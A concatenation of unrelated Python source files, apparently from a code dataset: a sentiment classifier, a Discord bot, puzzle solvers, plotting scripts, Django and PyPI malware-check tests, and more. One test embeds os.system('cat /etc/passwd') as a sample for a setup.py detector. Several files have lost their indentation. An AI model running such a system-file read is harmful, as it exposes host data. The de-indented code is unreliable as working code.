def __is_word_punctuation(self, word):
if word in self.__punctuation_dict:
punctuation = {"key": word, "value": self.__punctuation_dict[word]}
return punctuation
return ""
def __is_word_positive(self, word, seg_result, index):
"""
        Check whether the word is in the positive sentiment dictionary.
:param word:
:param seg_result:
:param index:
:return:
"""
if word in self.__positive_dict:
return self.__emotional_word_analysis(word, self.__positive_dict[word],
[x for x, y in seg_result], index)
return ""
def __is_word_negative(self, word, seg_result, index):
"""
        Check whether the word is in the negative sentiment dictionary.
:param word:
:param seg_result:
:param index:
:return:
"""
if word in self.__negative_dict:
return self.__emotional_word_analysis(word, self.__negative_dict[word],
[x for x, y in seg_result], index)
return ""
def __output_analysis(self, comment_analysis, run_out_file_path=None):
output = "Score:" + str(comment_analysis["score"]) + "\n"
for i in range(len(comment_analysis) - 1):
output += "Sub-clause" + str(i) + ": "
            clause = comment_analysis["sub-clause" + str(i)]
if len(clause["conjunction"]) > 0:
output += "conjunction:"
                for conjunction in clause["conjunction"]:
                    output += conjunction["key"] + " "
if len(clause["positive"]) > 0:
output += "positive:"
for positive in clause["positive"]:
if len(positive["denial"]) > 0:
for denial in positive["denial"]:
output += denial["key"] + str(denial["position"]) + "-"
if len(positive['adverb']) > 0:
for adverb in positive["adverb"]:
output += adverb["key"] + str(adverb["position"]) + "-"
output += positive["key"] + " "
if len(clause["negative"]) > 0:
output += "negative:"
for negative in clause["negative"]:
if len(negative["denial"]) > 0:
for denial in negative["denial"]:
output += denial["key"] + str(denial["position"]) + "-"
if len(negative["adverb"]) > 0:
for adverb in negative["adverb"]:
output += adverb["key"] + str(adverb["position"]) + "-"
output += negative["key"] + " "
if len(clause["punctuation"]) > 0:
output += "punctuation:"
for pattern in clause["pattern"]:
output += pattern["key"] + " "
output += "\n"
if run_out_file_path is not None:
self.__write_out_file(run_out_file_path, output)
else:
print(output)
@staticmethod
def __write_out_file(path, info, encoding="utf-8"):
with open(path, "a", encoding=encoding) as f:
f.write("%s" % info)
@staticmethod
def __split_sentence(sentence):
pattern = re.compile("[,,。.%、!!??;;~~…….… ]+")
split_clauses = pattern.split(sentence.strip())
punctuations = pattern.findall(sentence.strip())
try:
split_clauses.remove("")
except ValueError:
pass
punctuations.append("")
clauses = ["".join(x) for x in zip(split_clauses, punctuations)]
return clauses
def __get_phrase_dict(self):
"""
        Load the phrase dictionary.
:return:
"""
sentiment_dict = []
pattern = re.compile(r"\s+")
with open(self.__root_path + "phrase_dict.txt", "r", encoding="utf-8") as f:
for line in f:
phrase = {}
result = pattern.split(line.strip())
if len(result) >= 2:
phrase["key"] = result[0]
phrase["value"] = float(result[1])
for i, temp_split in enumerate(result):
if i < 2:
continue
else:
a, b = temp_split.split(":")
phrase[a] = b
sentiment_dict.append(phrase)
return sentiment_dict
@staticmethod
def __get_dict(path, encoding="utf-8"):
"""
        Build a sentiment dictionary from a file of "word value" pairs.
:param path:
:param encoding:
:return:
"""
sentiment_dict = {}
pattern = re.compile(r"\s+")
with open(path, encoding=encoding) as f:
for line in f:
result = pattern.split(line.strip())
if len(result) == 2:
sentiment_dict[result[0]] = float(result[1])
return sentiment_dict
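# A minimal usage sketch (my addition; it assumes the dictionary files under
# data/dict/ referenced in __init__ exist relative to the working directory):
if __name__ == '__main__':
    classifier = DictClassifier()
    # classify() returns 1 for positive sentiment, 0 otherwise
    print(classifier.classify("这款手机很好用"))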
|
nilq/baby-python
|
python
|
import discord
import logging
import os
class ValorantBot(discord.Client):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.BOT_LOG = os.getenv('BOT_LOG')
if self.BOT_LOG == 'INFO' or self.BOT_LOG is None or self.BOT_LOG == '':
logging.getLogger().setLevel(logging.INFO)
elif self.BOT_LOG == 'DEBUG':
logging.getLogger().setLevel(logging.DEBUG)
        else:
            logging.fatal('Neither INFO nor DEBUG specified for log level, refusing to start.')
            raise SystemExit(1)
self.BOT_TOKEN = os.getenv('BOT_TOKEN')
logging.info("ValorantBot initialized.")
def run(self, *args, **kwargs):
        if self.BOT_TOKEN is None or self.BOT_TOKEN == '':
            logging.fatal('Supply environment variable BOT_TOKEN to authenticate.')
            raise SystemExit(1)
        super().run(self.BOT_TOKEN)
async def on_ready(self):
logging.info(f'{self.user} has connected to server')
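# A minimal launch sketch (my addition): with discord.py >= 1.5 a Client can
# be given explicit intents; BOT_TOKEN and BOT_LOG come from the environment.
if __name__ == '__main__':
    bot = ValorantBot(intents=discord.Intents.default())
    bot.run()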
|
nilq/baby-python
|
python
|
import unittest
from typing import List, Text
INPUT_FILE = "input.txt"
TEST_INPUT_SHORT = "test_input_short.txt"
TEST_INPUT_LONG = "test_input_long.txt"
def getJolts(inputFile: Text):
jolts: List[int] = []
    with open(inputFile, "r") as f:
        lines = f.readlines()
for line in lines:
line = line.strip("\n")
jolts.append(int(line))
return jolts
def getJoltageDifferenceCountersProduct(jolts: List[int]):
if not jolts:
raise ValueError("No adapters found.")
jolts.append(max(jolts) + 3)
numAdaptersWithOneJoltageDifference = 0
numAdaptersWithThreeJoltageDifference = 0
currentJoltage = 0
joltsSet = set(jolts)
while currentJoltage != max(jolts):
if currentJoltage + 1 in joltsSet:
numAdaptersWithOneJoltageDifference += 1
currentJoltage += 1
elif currentJoltage + 2 in joltsSet:
currentJoltage += 2
elif currentJoltage + 3 in joltsSet:
numAdaptersWithThreeJoltageDifference += 1
currentJoltage += 3
else:
raise ValueError("Connecting adapters is not possible.")
return numAdaptersWithOneJoltageDifference * numAdaptersWithThreeJoltageDifference
def countDistinctWaysToArrangeAdapters(jolts: List[int]):
jolts.sort()
maxJoltage: int = max(jolts)
memo: List[int] = [0] * (maxJoltage + 1)
memo[0] = 1
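    # memo[j] counts the ways to chain adapters up to joltage j, where each
    # adapter accepts a source 1-3 jolts below it: memo[j] = memo[j-1] +
    # memo[j-2] + memo[j-3]. For j < 3 the negative indices wrap around to the
    # still-zero tail of memo, which is harmless as long as max(jolts) >= 3.
    # Worked example: jolts = [1, 2, 3] fills memo = [1, 1, 2, 4], i.e. four
    # arrangements: {3}, {1,3}, {2,3} and {1,2,3}.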
for jolt in jolts:
memo[jolt] = memo[jolt - 1] + memo[jolt - 2] + memo[jolt - 3]
return memo[maxJoltage]
def main():
jolts: List[int] = getJolts(INPUT_FILE)
print(getJoltageDifferenceCountersProduct(jolts)) # 2414
    print(countDistinctWaysToArrangeAdapters(jolts)) # 21156911906816
class JoltsTester(unittest.TestCase):
def test_getJoltageDifferenceCountersProduct_shortInput_correctProductReturned(self):
jolts: List[int] = getJolts(TEST_INPUT_SHORT)
self.assertEqual(35, getJoltageDifferenceCountersProduct(jolts))
def test_getJoltageDifferenceCountersProduct_longInput_correctProductReturned(self):
jolts: List[int] = getJolts(TEST_INPUT_LONG)
self.assertEqual(220, getJoltageDifferenceCountersProduct(jolts))
def test_countDistinctWaysToArrangeAdapters_shortInput_correctCountReturned(self):
jolts: List[int] = getJolts(TEST_INPUT_SHORT)
        self.assertEqual(8, countDistinctWaysToArrangeAdapters(jolts))
def test_countDistinctWaysToArrangeAdapters_longInput_correctCountReturned(self):
jolts: List[int] = getJolts(TEST_INPUT_LONG)
        self.assertEqual(19208, countDistinctWaysToArrangeAdapters(jolts))
if __name__ == '__main__':
# main()
unittest.main()
|
nilq/baby-python
|
python
|
from resolwe.process import IntegerField, Process, StringField
class PythonProcessDataIdBySlug(Process):
"""The process is used for testing get_data_id_by_slug."""
slug = "test-python-process-data-id-by-slug"
name = "Test Python Process Data ID by Slug"
version = "1.0.0"
process_type = "data:python:dataidbyslug"
requirements = {
"resources": {
"network": True,
},
}
class Input:
"""Input fields."""
slug = StringField(label="Slug")
class Output:
data_id = IntegerField(label="Data ID")
def run(self, inputs, outputs):
data_id = self.get_data_id_by_slug(inputs.slug)
outputs.data_id = data_id
|
nilq/baby-python
|
python
|
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from matplotlib import style
import pandas as pd
style.use('fivethirtyeight')
fig = plt.figure(figsize=(12,8))
ax1 = fig.add_subplot(2,2,1)
ax2 = fig.add_subplot(2,2,2)
ax3 = fig.add_subplot(2,2,3)
ax4 = fig.add_subplot(2,2,4)
def animate(i):
df = pd.read_csv('real time stock data.csv')
ys = df.iloc[1:, 2].values
xs = list(range(1, len(ys)+1))
ax1.clear()
ax1.plot(xs, ys)
ax1.set_title('BSE', fontsize=12 )
ys = df.iloc[1:, 3].values
ax2.clear()
ax2.plot(xs, ys)
ax2.set_title('Nifty', fontsize=12 )
ys = df.iloc[1:, 4].values
ax3.clear()
ax3.plot(xs, ys)
ax3.set_title('DJI', fontsize=12 )
ys = df.iloc[1:, 5].values
ax4.clear()
ax4.plot(xs, ys)
ax4.set_title('S&P', fontsize=12 )
ani = animation.FuncAnimation(fig, animate, interval=1000)
plt.tight_layout()
plt.show()
|
nilq/baby-python
|
python
|
import os
from src.MarkdownFile import MarkdownFile
class Parser:
def __init__(self, folderPath='.', ignoredDirectories=['.obsidian', '.git']):
self._folderPath = folderPath
self._ignoredDirectories = ignoredDirectories
        self.mdFiles: list[MarkdownFile] = []
        self._retrieveMarkdownFiles()
def _retrieveMarkdownFiles(self):
"""Directory traversal to find all .md files and stores them in _mdFiles
Full credit goes to: https://github.com/archelpeg
"""
self.mdFiles = []
for dirpath, _, files in os.walk(self._folderPath):
# print(f'Found directory: {dirpath}, and ignored={self._isDirectoryIgnored(dirpath)}')
if not self._isDirectoryIgnored(dirpath):
for file_name in files:
if file_name.endswith('.md'):
normalised_path = os.path.normpath(dirpath + "/" + file_name) # normalises path for current file system
file = MarkdownFile(file_name, normalised_path)
self.mdFiles.append(file)
def _isDirectoryIgnored(self, directory: str):
"""Returns a boolean indicating if the directory specified is in self._ignoredDirectories"""
directory = directory.replace('\\', '/')
normalisedFolderPath = self._folderPath.replace('\\', '/')
splitDirectory = directory.split('/')
splitFolderPath = normalisedFolderPath.split('/')
# Remove folderPath in order to search uniquely in subdirectories
for el in splitFolderPath:
splitDirectory.remove(el)
# Return if the subdirectory starts with a element in ignoredDirectories
if len(splitDirectory) != 0:
return splitDirectory[0] in self._ignoredDirectories
else:
return False
def searchFilesWithTag(self, tag=None):
"""Find all files containing a specific tag
"""
files = set()
        if tag is None:
            return files
for file in self.mdFiles:
if tag in file.tags:
files.add(file)
return files
def findSubFilesForFiles(self, files: set):
"""Iteration to grow files while it can"""
while not self._growSubFiles(files):
pass
return files
def _growSubFiles(self, files):
"""Add new files found following links in files and stores them in files"""
addedFiles = set()
for file in files:
            linkedFiles = list(file.links)
linkedFiles = [file # Get the full links
for file in self.mdFiles
for link in linkedFiles
if link in file.fileName
]
linkedFiles = set(linkedFiles) - files # Only keep not added files
for link in linkedFiles:
addedFiles.add(link)
for file in addedFiles:
files.add(file)
return len(addedFiles) == 0
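# A minimal usage sketch (my addition; the tag format depends on how
# MarkdownFile populates .tags, so '#project' is a hypothetical value):
if __name__ == '__main__':
    parser = Parser(folderPath='.')
    tagged = parser.searchFilesWithTag('#project')
    related = parser.findSubFilesForFiles(tagged)
    print(f'{len(related)} files reachable from tag #project')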
|
nilq/baby-python
|
python
|
# Created by Martin.cz
# Copyright (c) Martin Strohalm. All rights reserved.
import pero
class DrawTest(pero.Graphics):
"""Test case for text properties drawing."""
def draw(self, canvas, *args, **kwargs):
"""Draws the test."""
# clear canvas
canvas.fill(pero.colors.White)
# set scaling
canvas.draw_scale = 1
canvas.line_scale = 3
canvas.font_scale = 1.5
# init glyphs
origin = pero.Plus(
size = 20,
line_width = 1,
line_color = pero.colors.Red)
label = pero.Text(
angle = pero.rads(20),
font_size = 12,
font_name = "Arial",
text_spacing = .5,
text_bgr_color = pero.colors.Grey.opaque(.3))
rect = pero.Rect(
line_color = pero.colors.Green,
fill_color = None)
# init coords
padding = 40
# test alignment and baseline
y = padding
for base in (pero.TEXT_BASE_TOP, pero.TEXT_BASE_MIDDLE, pero.TEXT_BASE_BOTTOM):
x = padding
for align in (pero.TEXT_ALIGN_LEFT, pero.TEXT_ALIGN_CENTER, pero.TEXT_ALIGN_RIGHT):
text = "%s\n%s" % (base.upper(), align.upper())
label.draw(canvas, x=x, y=y, text=text, text_align=align, text_base=base)
bbox = canvas.get_text_bbox(text, x, y, label.angle)
rect.draw(canvas, x=bbox.x, y=bbox.y, width=bbox.width, height=bbox.height)
origin.draw(canvas, x=x, y=y)
x += 250/canvas.draw_scale
y += 150/canvas.draw_scale
# run test
if __name__ == '__main__':
pero.debug(DrawTest(), 'show', "Text", 700, 370)
|
nilq/baby-python
|
python
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pretend
import pytest
import yara
from warehouse.malware.checks.setup_patterns import check as c
from warehouse.malware.models import (
MalwareCheckState,
VerdictClassification,
VerdictConfidence,
)
from .....common.db.malware import MalwareCheckFactory
from .....common.db.packaging import FileFactory
def test_initializes(db_session):
check_model = MalwareCheckFactory.create(
name="SetupPatternCheck", state=MalwareCheckState.Enabled
)
check = c.SetupPatternCheck(db_session)
assert check.id == check_model.id
assert isinstance(check._yara_rules, yara.Rules)
@pytest.mark.parametrize(
("obj", "file_url"), [(None, pretend.stub()), (pretend.stub(), None)]
)
def test_scan_missing_kwargs(db_session, obj, file_url):
MalwareCheckFactory.create(
name="SetupPatternCheck", state=MalwareCheckState.Enabled
)
check = c.SetupPatternCheck(db_session)
with pytest.raises(c.FatalCheckException):
check.scan(obj=obj, file_url=file_url)
def test_scan_non_sdist(db_session):
MalwareCheckFactory.create(
name="SetupPatternCheck", state=MalwareCheckState.Enabled
)
check = c.SetupPatternCheck(db_session)
file = FileFactory.create(packagetype="bdist_wheel")
check.scan(obj=file, file_url=pretend.stub())
assert check._verdicts == []
def test_scan_no_setup_contents(db_session, monkeypatch):
monkeypatch.setattr(
c, "fetch_url_content", pretend.call_recorder(lambda *a: pretend.stub())
)
monkeypatch.setattr(
c, "extract_file_content", pretend.call_recorder(lambda *a: None)
)
MalwareCheckFactory.create(
name="SetupPatternCheck", state=MalwareCheckState.Enabled
)
check = c.SetupPatternCheck(db_session)
file = FileFactory.create(packagetype="sdist")
check.scan(obj=file, file_url=pretend.stub())
assert len(check._verdicts) == 1
assert check._verdicts[0].check_id == check.id
assert check._verdicts[0].file_id == file.id
assert check._verdicts[0].classification == VerdictClassification.Indeterminate
assert check._verdicts[0].confidence == VerdictConfidence.High
assert (
check._verdicts[0].message
== "sdist does not contain a suitable setup.py for analysis"
)
def test_scan_benign_contents(db_session, monkeypatch):
monkeypatch.setattr(
c, "fetch_url_content", pretend.call_recorder(lambda *a: pretend.stub())
)
monkeypatch.setattr(
c,
"extract_file_content",
pretend.call_recorder(lambda *a: b"this is a benign string"),
)
MalwareCheckFactory.create(
name="SetupPatternCheck", state=MalwareCheckState.Enabled
)
check = c.SetupPatternCheck(db_session)
file = FileFactory.create(packagetype="sdist")
check.scan(obj=file, file_url=pretend.stub())
assert len(check._verdicts) == 1
assert check._verdicts[0].check_id == check.id
assert check._verdicts[0].file_id == file.id
assert check._verdicts[0].classification == VerdictClassification.Benign
assert check._verdicts[0].confidence == VerdictConfidence.Low
assert check._verdicts[0].message == "No malicious patterns found in setup.py"
def test_scan_matched_content(db_session, monkeypatch):
monkeypatch.setattr(
c, "fetch_url_content", pretend.call_recorder(lambda *a: pretend.stub())
)
monkeypatch.setattr(
c,
"extract_file_content",
pretend.call_recorder(
lambda *a: b"this looks suspicious: os.system('cat /etc/passwd')"
),
)
MalwareCheckFactory.create(
name="SetupPatternCheck", state=MalwareCheckState.Enabled
)
check = c.SetupPatternCheck(db_session)
file = FileFactory.create(packagetype="sdist")
check.scan(obj=file, file_url=pretend.stub())
assert len(check._verdicts) == 1
assert check._verdicts[0].check_id == check.id
assert check._verdicts[0].file_id == file.id
assert check._verdicts[0].classification == VerdictClassification.Threat
assert check._verdicts[0].confidence == VerdictConfidence.High
assert check._verdicts[0].message == "process_spawn_in_setup"
|
nilq/baby-python
|
python
|
########################################
# Automatically generated, do not edit.
########################################
from pyvisdk.thirdparty import Enum
AutoStartWaitHeartbeatSetting = Enum(
'no',
'systemDefault',
'yes',
)
|
nilq/baby-python
|
python
|
"""
Vulnerability service interfaces and implementations for `pip-audit`.
"""
from .interface import (
Dependency,
ResolvedDependency,
ServiceError,
SkippedDependency,
VulnerabilityResult,
VulnerabilityService,
)
from .osv import OsvService
from .pypi import PyPIService
__all__ = [
"Dependency",
"ResolvedDependency",
"ServiceError",
"SkippedDependency",
"VulnerabilityResult",
"VulnerabilityService",
"OsvService",
"PyPIService",
]
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
import sys
from shutil import rmtree
from os.path import abspath, dirname, join
import django
from django.conf import settings
sys.path.insert(0, abspath(dirname(__file__)))
if not settings.configured:
media_root = join(abspath(dirname(__file__)), 'test_files')
rmtree(media_root, ignore_errors=True)
installed_apps = (
'django.contrib.contenttypes',
'django.contrib.auth',
'django.contrib.sessions',
'django.contrib.admin',
'simple_history',
'simple_history.tests',
'simple_history.tests.external',
)
auth_user_model = 'auth.User'
if django.VERSION >= (1, 5):
installed_apps += ('simple_history.tests.custom_user', )
auth_user_model = 'custom_user.CustomUser'
settings.configure(
ROOT_URLCONF='simple_history.tests.urls',
MEDIA_ROOT=media_root,
STATIC_URL='/static/',
INSTALLED_APPS=installed_apps,
DATABASES={
'default': {
'ENGINE': 'django.db.backends.sqlite3',
}
},
AUTH_USER_MODEL=auth_user_model
)
def main():
from django.test.simple import DjangoTestSuiteRunner
failures = DjangoTestSuiteRunner(
verbosity=1, interactive=True, failfast=False).run_tests(['tests'])
sys.exit(failures)
if __name__ == "__main__":
main()
|
nilq/baby-python
|
python
|
import lightgbm as lgbm
from sklearn.model_selection import StratifiedKFold
import numpy as np
import pandas as pd
from sklearn.metrics import accuracy_score
def load_data():
real_df = pd.read_csv(
"feat/real.txt",
delimiter=" ",
header=None,
names=["a", "b", "c", "d", "e", "f"],
index_col=False,
float_precision="high",
)
real_df["target"] = 1
fake_df = pd.read_csv(
"feat/fake.txt",
delimiter=" ",
header=None,
names=["a", "b", "c", "d", "e", "f"],
index_col=False,
float_precision="high",
)
fake_df["target"] = 0
real_df.head()
df = pd.concat([real_df, fake_df], ignore_index=True, sort=False)
del real_df, fake_df
y = df.target.values
df = df.drop("target", axis="columns").values
return df, y
data, target = load_data()
NFOLDS = 5
kfold = StratifiedKFold(n_splits=NFOLDS, shuffle=True, random_state=218)
learning_rate = 0.1
num_leaves = 15
min_data_in_leaf = 2000
feature_fraction = 0.6
num_boost_round = 100
params = {"objective": "binary",
"boosting_type": "gbdt",
"learning_rate": learning_rate,
"num_leaves": num_leaves,
"max_bin": 256,
"feature_fraction": feature_fraction,
"drop_rate": 0.1,
"is_unbalance": False,
"max_drop": 50,
"min_child_samples": 10,
"min_child_weight": 150,
"min_split_gain": 0,
"subsample": 0.9,
"metric": 'binary',
"verbose": 5,
"n_jobs": -1
}
x_score = []
final_cv_train = np.zeros(len(data))
kf = kfold.split(data, target)
for i, (train_fold, validate) in enumerate(kf):
X_train, X_validate, label_train, label_validate = \
data[train_fold, :], data[validate, :], target[train_fold], target[validate]
dtrain = lgbm.Dataset(X_train, label_train)
dvalid = lgbm.Dataset(X_validate, label_validate, reference=dtrain)
bst = lgbm.train(params, dtrain, num_boost_round, valid_sets=dvalid,
early_stopping_rounds=100)
    raw_preds = bst.predict(X_validate)
    preds = (raw_preds > 0.5).astype(int)  # threshold probabilities into class labels
    print(preds.shape)
    print(preds)
    print(f"Fold {i+1} score {accuracy_score(label_validate, preds)}")
|
nilq/baby-python
|
python
|
import datetime as dt
import pandas as pd
class BudgetFiscalYear():
'''Class to describe the federal fiscal year'''
__base = None
__bfy = None
__efy = None
__today = None
__date = None
__startdate = None
__enddate = None
__expiration = None
__weekends = 0
__workdays = 0
__year = None
__month = None
__day = None
__holidays = None
__data = None
__dataframe = None
@property
def firstyear( self ):
        if self.__bfy is not None:
            return self.__bfy
@firstyear.setter
def firstyear( self, yr ):
if yr is not None:
self.__bfy = str( yr )
self.__data[ 'firstyear' ] = self.__bfy
@property
def lastyear( self ):
if self.__efy is not None:
return self.__efy
@lastyear.setter
def lastyear( self, yr ):
if yr is not None:
self.__efy = str( yr )
self.__data[ 'lastyear' ] = self.__efy
@property
def calendaryear( self ):
if self.__year:
return self.__year
@calendaryear.setter
def calendaryear( self, yr ):
if yr is not None:
self.__year = str( yr )
self.__data[ 'calendaryear' ] = self.__year
@property
def startdate( self ):
if isinstance( self.__startdate, dt.date ):
return self.__startdate
@startdate.setter
def startdate( self, start ):
if isinstance( start, dt.date ):
self.__startdate = start
self.__data[ 'startdate' ] = self.__startdate
@property
def enddate( self ):
if isinstance( self.__enddate, dt.date ):
return self.__enddate
@enddate.setter
def enddate( self, end ):
if isinstance( end, dt.date ):
self.__enddate = end
self.__data[ 'enddate' ] = self.__enddate
@property
def expiration( self ):
if isinstance( self.__expiration, dt.date ):
return self.__expiration
@expiration.setter
def expiration( self, exp ):
if isinstance( exp, dt.date ):
self.__expiration = exp
self.__data[ 'expiration' ] = self.__expiration
@property
def weekends( self ):
if self.__weekends is not None:
return self.__weekends
@weekends.setter
def weekends( self, end ):
if isinstance( end, int ):
self.__weekends = end
self.__data[ 'weekends' ] = self.__weekends
@property
def workdays( self ):
if self.__workdays is not None:
return float( self.__workdays )
@workdays.setter
def workdays( self, work ):
if isinstance( work, int ):
self.__workdays = work
self.__data[ 'workdays' ] = self.__workdays
@property
def date( self ):
if isinstance( self.__date, dt.date ):
return self.__date
@date.setter
def date( self, today ):
if isinstance( today, dt.date ):
self.__date = today
self.__data[ 'date' ] = self.__date
@property
def day( self ):
if self.__day is not None:
return self.__day
@day.setter
def day( self, today ):
if isinstance( today, dt.date ):
self.__day = today
self.__data[ 'day' ] = self.__day
@property
def month( self ):
if self.__month is not None:
return self.__month
@property
def holidays( self ):
if self.__holidays is not None:
return self.__holidays
@property
def data( self ):
if self.__data is not None:
return self.__data
@data.setter
def data( self, src ):
if isinstance( src, pd.DataFrame ):
self.__data = src
@property
def table( self ):
if self.__dataframe is not None:
return self.__dataframe
def __init__( self, bfy ):
self.__today = dt.date.today()
self.__base = str( bfy )
self.__date = self.__today
self.__year = int( self.__base )
self.__day = self.__date.day
self.__month = self.__date.month
self.__startdate = dt.date( self.__year, 10, 1 )
self.__bfy = str( self.__startdate.year )
self.__enddate = dt.date( self.__year + 1, 9, 30 )
self.__efy = str( self.__enddate.year )
self.__data = { 'base': self.__base,
'date': self.__date,
'calendaryear': self.__year,
'day': self.__day,
'month': self.__month,
'startdate': self.__startdate,
'enddate': self.__enddate }
        self.__dataframe = pd.DataFrame()
def __str__( self ):
return str( self.__year )
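# A minimal usage sketch (my addition): a US federal fiscal year starts on
# October 1 of its base year and ends on September 30 of the next year.
if __name__ == '__main__':
    fy = BudgetFiscalYear( '2023' )
    print( fy.startdate, fy.enddate )    # 2023-10-01 2024-09-30
    print( fy.firstyear, fy.lastyear )   # 2023 2024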
|
nilq/baby-python
|
python
|
# import os
# import shutil
# from django.test import TestCase
# from django_dicom.data_import.local_import import LocalImport
# from django_dicom.models.image import Image
# from tests.fixtures import TEST_FILES_PATH, TEST_IMAGE_PATH, TEST_ZIP_PATH
# TESTS_DIR = os.path.normpath("./tests")
# TEMP_FILES = os.path.join(TESTS_DIR, "tmp*.dcm")
# IMPORTED_DIR = os.path.join(TESTS_DIR, "MRI")
# class LocalImportTestCase(TestCase):
# """
# Tests for the :class:`~django_dicom.data_import.local_import.LocalImport` class,
# which is meant to provide methods to facilitate data import.
# """
# def tearDown(self):
# """
# Tries to remove the :class:`~django_dicom.models.image.Image` instances
# that may have been created during each test, as well as the destination
# directory.
# For more information see unittest's :meth:`~unittest.TestCase.tearDown` method.
# """
# Image.objects.all().delete()
# try:
# shutil.rmtree(IMPORTED_DIR)
# except FileNotFoundError:
# pass
# def test_initialization(self):
# """
# Tests that the :class:`~django_dicom.data_import.local_import.LocalImport`
# class is initialized properly.
# """
# instance = LocalImport(TEST_IMAGE_PATH)
# self.assertEqual(instance.path, TEST_IMAGE_PATH)
# def test_import_local_dcm(self):
# """
# Tests importing a single DICOM image from some path using
# :meth:`~django_dicom.data_import.local_import.LocalImport.import_local_dcm`.
# """
# image, created = LocalImport.import_local_dcm(TEST_IMAGE_PATH)
# self.assertTrue(created)
# self.assertIsInstance(image, Image)
# # Also check that the created instance is updated
# self.assertIsNotNone(image.uid)
# self.assertIsNotNone(image.series)
# self.assertIsNotNone(image.series.study)
# self.assertIsNotNone(image.series.patient)
# def test_import_local_zip_archive(self):
# """
# Tests importing DICOM images from a single ZIP archive using
# :meth:`~django_dicom.data_import.local_import.LocalImport.import_local_zip_archive`.
# """
# self.assertEqual(Image.objects.count(), 0)
# LocalImport.import_local_zip_archive(TEST_ZIP_PATH, verbose=False)
# # The ZIP archive contains 3 images
# self.assertEqual(Image.objects.count(), 3)
# def test_path_generator_without_extension(self):
# """
# Tests the :meth:`~django_dicom.data_import.local_import.LocalImport.path_generator`
# method with no *extension* parameter setting.
# """
# counter = 0
# for path in LocalImport(TEST_FILES_PATH).path_generator():
# is_valid_path = os.path.isfile(path)
# self.assertTrue(is_valid_path)
# is_under_base_dir = path.startswith(TEST_FILES_PATH)
# self.assertTrue(is_under_base_dir)
# counter += 1
# # There are 6 files in the given path
# self.assertEqual(counter, 6)
# def test_path_generator_with_extension(self):
# """
# Tests the :meth:`~django_dicom.data_import.local_import.LocalImport.path_generator`
# method with the *extension* parameter set.
# """
# # A dictionary of extensions and the number of files we expect
# extensions = {"zip": 2, "dcm": 4}
# for extension in extensions:
# counter = 0
# generator = LocalImport(TEST_FILES_PATH).path_generator(extension=extension)
# for path in generator:
# is_valid_path = os.path.isfile(path)
# self.assertTrue(is_valid_path)
# is_under_base_dir = path.startswith(TEST_FILES_PATH)
# self.assertTrue(is_under_base_dir)
# counter += 1
# self.assertEqual(counter, extensions.get(extension))
# def test_import_dcm_files(self):
# """
# Tests importing multiple DICOM images at once using the
# :meth:`~django_dicom.data_import.local_import.LocalImport.import_dcm_files`
# method.
# """
# self.assertEqual(Image.objects.count(), 0)
# LocalImport(TEST_FILES_PATH).import_dcm_files(verbose=False)
# # There are 4 DICOM images in the test files directory.
# self.assertEqual(Image.objects.count(), 4)
# def test_import_zip_archives(self):
# """
# Tests importing DICOM images from multiple ZIP archives at once using the
# :meth:`~django_dicom.data_import.local_import.LocalImport.import_zip_archives`
# method.
# """
# self.assertEqual(Image.objects.count(), 0)
# LocalImport(TEST_FILES_PATH).import_zip_archives(verbose=False)
# # The ZIP archives contain a total of 4 (unique) DICOM images.
# self.assertEqual(Image.objects.count(), 4)
# def test_run_with_zip_archives(self):
# """
# Tests the :class:`~django_dicom.data_import.local_import.LocalImport` class's
# :meth:`~django_dicom.data_import.local_import.LocalImport.run` method when
# set to include ZIP archives.
# """
# self.assertEqual(Image.objects.count(), 0)
# LocalImport(TEST_FILES_PATH).run(import_zip=True, verbose=False)
# # The test files directory contains a total of 8 (unique) DICOM images.
# self.assertEqual(Image.objects.count(), 8)
# def test_run_without_zip_archives(self):
# """
# Tests the :class:`~django_dicom.data_import.local_import.LocalImport` class's
# :meth:`~django_dicom.data_import.local_import.LocalImport.run` method when
# set to exclude ZIP archives.
# """
# self.assertEqual(Image.objects.count(), 0)
# LocalImport(TEST_FILES_PATH).run(import_zip=False, verbose=False)
# # There are 4 DICOM images in the test files directory.
# self.assertEqual(Image.objects.count(), 4)
# def test_run_default_configuration(self):
# """
# Tests the :class:`~django_dicom.data_import.local_import.LocalImport` class's
# :meth:`~django_dicom.data_import.local_import.LocalImport.run` method's
# default configuration is to include ZIP archives.
# """
# self.assertEqual(Image.objects.count(), 0)
# LocalImport(TEST_FILES_PATH).run(verbose=False)
# # The test files directory contains a total of 8 (unique) DICOM images.
# self.assertEqual(Image.objects.count(), 8)
|
nilq/baby-python
|
python
|
import os
import joblib
import pandas as pd
import numpy as np
from dataclasses import dataclass
from sklearn.preprocessing import RobustScaler
from sklearn.feature_selection import VarianceThreshold
from rdkit import Chem
from rdkit.Chem import MACCSkeys
from rdkit.Chem import MolFromSmarts
from mordred import Calculator, descriptors
# VARIABLES
PATH = os.path.abspath(os.path.dirname(__file__))
DATA_PATH = os.path.abspath(os.path.join(PATH, "..", "data"))
# PROCESSING FUNCTIONS
MAX_NA = 0.2
class NanFilter(object):
def __init__(self):
self._name = "nan_filter"
def fit(self, X):
max_na = int((1 - MAX_NA) * X.shape[0])
idxs = []
for j in range(X.shape[1]):
c = np.sum(np.isnan(X[:, j]))
if c > max_na:
continue
else:
idxs += [j]
self.col_idxs = idxs
def transform(self, X):
return X[:, self.col_idxs]
def save(self, file_name):
joblib.dump(self, file_name)
def load(self, file_name):
return joblib.load(file_name)
class Scaler(object):
def __init__(self):
self._name = "scaler"
self.abs_limit = 10
self.skip = False
def set_skip(self):
self.skip = True
def fit(self, X):
if self.skip:
return
self.scaler = RobustScaler()
self.scaler.fit(X)
def transform(self, X):
if self.skip:
return X
X = self.scaler.transform(X)
X = np.clip(X, -self.abs_limit, self.abs_limit)
return X
def save(self, file_name):
joblib.dump(self, file_name)
def load(self, file_name):
return joblib.load(file_name)
class Imputer(object):
def __init__(self):
self._name = "imputer"
self._fallback = 0
def fit(self, X):
ms = []
for j in range(X.shape[1]):
vals = X[:, j]
mask = ~np.isnan(vals)
vals = vals[mask]
if len(vals) == 0:
m = self._fallback
else:
m = np.median(vals)
ms += [m]
